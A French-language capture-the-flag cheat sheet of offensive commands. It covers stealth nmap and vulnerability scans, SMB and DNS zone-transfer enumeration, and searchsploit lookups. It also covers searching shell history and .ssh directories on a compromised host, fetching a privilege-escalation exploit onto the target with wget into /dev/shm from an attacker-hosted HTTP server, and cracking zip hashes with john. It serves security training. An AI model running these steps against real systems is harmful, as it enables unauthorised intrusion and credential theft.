Capture The Flag

Liens :

DĂ©part :

Reconnaissance

De maniÚre générale :

Si t'obtiens un accĂšs sur un linux/windows :

Sur Linux :

history
find /root /home -name *history*

find {/root,/home/*}/.ssh

ip n
ip -br a; echo; ip r

Sur Windows :

ipconfig -all
arp -a
route

Scan de port

# pinguer tout les hÎtes d'un réseau (port 80 + ICMP echo-request)
nmap -T4 -sP 192.168.0.0/24

# scan discret (n'envoi que des TCP SYN, moins de chance que les connexions soient loggés)
nmap -T4 -sS <ip>

# OS + info sur les services
nmap -T4 -A -oN scan1.txt <ip>
# scan de vuln
nmap -T4 -sV --script vulners -oN scan1.txt <ip>
# sur tous les ports
nmap -T4 -sV --script vulners -oN scan1.txt <ip> -p-

TODO Enumération SMB

Si les ports 139 et 445 sont ouverts, il y a des chances que SMB tourne sur la machine.

enum4linux -U <ip>

Metasploit

msfconsole

DNS

Si on a trouvé un serveur DNS :

echo 'nameserver <ip>' >> /etc/resolv.conf

Voir tous les enregistrements d'un domaine :

host -a example.com

Mapper un domaine : https://dnsdumpster.com

Pour faire un transfert de zone :

dig @<?> AXFR <fqdn ?>

Vulnérabilités

Pour chercher des vulnérabilités :

ou la commande searchsploit:

# pour chercher (case insensitive AND)
searchsploit cutenews
# lire l'exploit
searchsploit -x <filename>
# copier l'exploit dans le CWD
searchsploit -m <filename>

Local Privilege Escalation

Sur la machine cible :

# obtenir la version du noyau Linux
uname -a

# télécharger l'exploit (et le stocker en RAM)
wget URL > /dev/shm/lpe

Sur ta machine :

# regarder s'il existe des exploit
searchsploit 4.15
# le télécharger
searchsploit -m <filename>
# l'héberger
python -m SimpleHTTPServer

Cassage de mot de passe

Pour extraire le hash du mot de passe d'un zip : zip2john file.zip > hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SQLite

sqlitebrowser fichier.sqlite